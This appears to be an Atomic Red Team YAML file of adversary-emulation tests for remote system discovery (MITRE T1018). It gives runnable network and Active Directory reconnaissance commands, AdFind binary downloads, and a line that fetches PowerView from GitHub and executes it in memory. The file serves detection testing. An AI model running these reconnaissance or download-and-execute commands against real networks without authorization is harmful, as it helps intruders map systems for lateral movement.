atomic-red-team-gs/atomics/T1018/T1018.yaml

attack_technique: T1018
display_name: Remote System Discovery
atomic_tests:
- name: Remote System Discovery - net
  auto_generated_guid: 85321a9c-897f-4a60-9f20-29788e50bccd
  description: |
    Identify remote systems with net.exe.

    Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.
  supported_platforms:
  - windows
  executor:
    command: |
      net view /domain
      net view
    name: command_prompt
- name: Remote System Discovery - net group Domain Computers
  auto_generated_guid: f1bf6c8f-9016-4edf-aff9-80b65f5d711f
  description: |
    Identify remote systems with net.exe querying the Active Directory Domain Computers group.

    Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.
  supported_platforms:
  - windows
  executor:
    command: |
      net group "Domain Computers" /domain
    name: command_prompt
- name: Remote System Discovery - nltest
  auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
  description: |
    Identify domain controllers for specified domain.

    Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
  supported_platforms:
  - windows
  input_arguments:
    target_domain:
      description: Domain to query for domain controllers
      type: string
      default: '%userdnsdomain%'
  executor:
    command: |
      nltest.exe /dclist:#{target_domain}
    name: command_prompt
- name: Remote System Discovery - ping sweep
  auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592
  description: |
    Identify remote systems via ping sweep.

    Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
  supported_platforms:
  - windows
  input_arguments:
    start_host:
      description: Last octet starting value for ping sweep.
      type: string
      default: "1"
    stop_host:
      description: Last octet ending value for ping sweep.
      type: string
      default: "254"
    subnet:
      description: Subnet used for ping sweep.
      type: string
      default: 192.168.1
  executor:
    command: |
      for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i  
    name: command_prompt
- name: Remote System Discovery - arp
  auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574
  description: |
    Identify remote systems via arp. 

    Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
  supported_platforms:
  - windows
  executor:
    command: |
      arp -a
    name: command_prompt
- name: Remote System Discovery - arp nix
  auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951
  description: |
    Identify remote systems via arp.

    Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
  supported_platforms:
  - linux
  - macos
  dependency_executor_name: sh
  dependencies:
  - description: |
      Check if arp command exists on the machine
    prereq_command: |
      if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
    get_prereq_command: |
      (which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)
  executor:
    command: |
      arp -a | grep -v '^?'
    name: sh
- name: Remote System Discovery - sweep
  auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de
  description: |
    Identify remote systems via ping sweep.

    Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
  supported_platforms:
  - linux
  - macos
  input_arguments:
    start_host:
      description: Subnet used for ping sweep.
      type: string
      default: "1"
    stop_host:
      description: Subnet used for ping sweep.
      type: string
      default: "254"
    subnet:
      description: Subnet used for ping sweep.
      type: string
      default: 192.168.1
  executor:
    command: |
      for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
    name: sh
- name: Remote System Discovery - nslookup
  auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f
  description: |
    Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig.

    Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.
  supported_platforms:
  - windows
  executor:
    command: |
      $localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
      $pieces = $localip.split(".")
      $firstOctet = $pieces[0]
      $secondOctet = $pieces[1]
      $thirdOctet = $pieces[2]
      foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
    name: powershell
    elevation_required: true
- name: Remote System Discovery - adidnsdump
  auto_generated_guid: 95e19466-469e-4316-86d2-1dc401b5a959
  description: |
    This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks
    Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.
    Successful execution of this test will list dns zones in the terminal.
  supported_platforms:
  - windows
  input_arguments:
    user_name:
      description: username including domain.
      type: string
      default: 'domain\user'
    acct_pass:
      description: Account password.
      type: string
      default: "password"
    host_name:
      description: hostname or ip address to connect to.
      type: string
      default: "192.168.1.1"
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Computer must have python 3 installed
    prereq_command: |
      if (python --version) {exit 0} else {exit 1}
    get_prereq_command: |
      echo "Python 3 must be installed manually"
  - description: |
      Computer must have pip installed
    prereq_command: |
      if (pip3 -V) {exit 0} else {exit 1}
    get_prereq_command: |
      echo "PIP must be installed manually"
  - description: |
      adidnsdump must be installed and part of PATH
    prereq_command: |
      if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
    get_prereq_command: |
      pip3 install adidnsdump
  executor:
    command: |
      adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
    name: command_prompt
    elevation_required: true
- name: Adfind - Enumerate Active Directory Computer Objects
  auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4
  description: |
    Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects
    reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
  supported_platforms:
  - windows
  dependency_executor_name: powershell
  dependencies:
  - description: |
      AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
    prereq_command: |
      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
  executor:
    command: |
      "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer)
    name: command_prompt
- name: Adfind - Enumerate Active Directory Domain Controller Objects
  auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
  description: |
    Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects
    reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
  supported_platforms:
  - windows
  dependency_executor_name: powershell
  dependencies:
  - description: |
      AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
    prereq_command: |
      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
  executor:
    command: |
      "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc dclist
    name: command_prompt

- name: Remote System Discovery - ip neighbour
  auto_generated_guid: 158bd4dd-6359-40ab-b13c-285b9ef6fa25
  description: |
    Use the ip neighbour command to display the known link layer (ARP table) addresses for hosts sharing the same network segment. 
  supported_platforms:
  - linux
  dependency_executor_name: sh
  dependencies:
  - description: |
      Check if ip command exists on the machine
    prereq_command: |
      if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
    get_prereq_command: |
      apt-get install iproute2 -y
  executor:
    command: |
      ip neighbour show
    name: sh

- name: Remote System Discovery - ip route
  auto_generated_guid: 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1
  description: |
    Use the ip route command to display the kernels routing tables. 
  supported_platforms:
  - linux
  dependency_executor_name: sh
  dependencies:
  - description: |
      Check if ip command exists on the machine
    prereq_command: |
      if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
    get_prereq_command: |
      apt-get install iproute2 -y
  executor:
    command: |
      ip route show
    name: sh

- name: Remote System Discovery - netstat
  auto_generated_guid: d2791d72-b67f-4615-814f-ec824a91f514
  description: |
    Use the netstat command to display the kernels routing tables.
  supported_platforms:
  - linux
  executor:
    command: |
      netstat -r | grep default
    name: sh

- name: Remote System Discovery - ip tcp_metrics
  auto_generated_guid: 6c2da894-0b57-43cb-87af-46ea3b501388
  description: |
    Use the ip tcp_metrics command to display the recent cached entries for IPv4 and IPv6 source and destination addresses. 
  supported_platforms:
  - linux
  dependency_executor_name: sh
  dependencies:
  - description: |
      Check if ip command exists on the machine
    prereq_command: |
      if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
    get_prereq_command: |
      apt-get install iproute2 -y
  executor:
    command: |
      ip tcp_metrics show |grep --invert-match "^127\."
    name: sh
- name: Enumerate domain computers within Active Directory using DirectorySearcher
  auto_generated_guid: 962a6017-1c09-45a6-880b-adc9c57cb22e
  description: |
    This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain. 
    This test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement. 
    Reference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks). 
    Upon successful execution, this test will output the names of the computers that reside on the domain to the console window. 
  supported_platforms:
  - windows
  dependency_executor_name: powershell
  dependencies:
  - description: This PC must be joined to a domain.
    prereq_command: |-
      if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}
    get_prereq_command: |-
      write-host "This PC must be manually added to a domain." 
  executor:
    command: |
      $DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
      $DirectorySearcher.PropertiesToLoad.Add("Name")
      $Computers = $DirectorySearcher.findall()
      foreach ($Computer in $Computers) {
        $Computer = $Computer.Properties.name
        if (!$Computer) { Continue }
        Write-Host $Computer}
    name: powershell
    elevation_required: false
- name: Enumerate Active Directory Computers with Get-AdComputer
  auto_generated_guid: 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
  description: |
    The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
    Upon successful execution a listing of Computers will output with their paths in AD.
    Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
  supported_platforms:
  - windows
  executor:
    name: powershell
    elevation_required: false
    command: |
      Get-AdComputer -Filter *
- name: Enumerate Active Directory Computers with ADSISearcher
  auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
  description: |
    The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
    Upon successful execution a listing of computers will output with their paths in AD.
    Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
  supported_platforms:
  - windows
  executor:
    name: powershell
    elevation_required: false
    command: |
      ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
- name: Get-DomainController with PowerView
  auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4
  description: |
    Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
  supported_platforms:
  - windows
  executor:
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
    name: powershell
- name: Get-WmiObject to Enumerate Domain Controllers
  auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
  description: |
    The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
    Upon successful execution a listing of Systems from AD will output with their paths.
    Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
  supported_platforms:
  - windows
  executor:
    name: powershell
    elevation_required: false
    command: |
      try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
      catch { $_; exit $_.Exception.HResult }
- name: Remote System Discovery - net group Domain Controller
  auto_generated_guid: 5843529a-5056-4bc1-9c13-a311e2af4ca0
  description: |
    Identify remote systems with net.exe querying the Active Directory Domain Controller.
    Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Controller" in the domain. Output will be via stdout.
  supported_platforms:
  - windows
  executor:
    command: |
      net group /domain "Domain controllers"
    name: command_prompt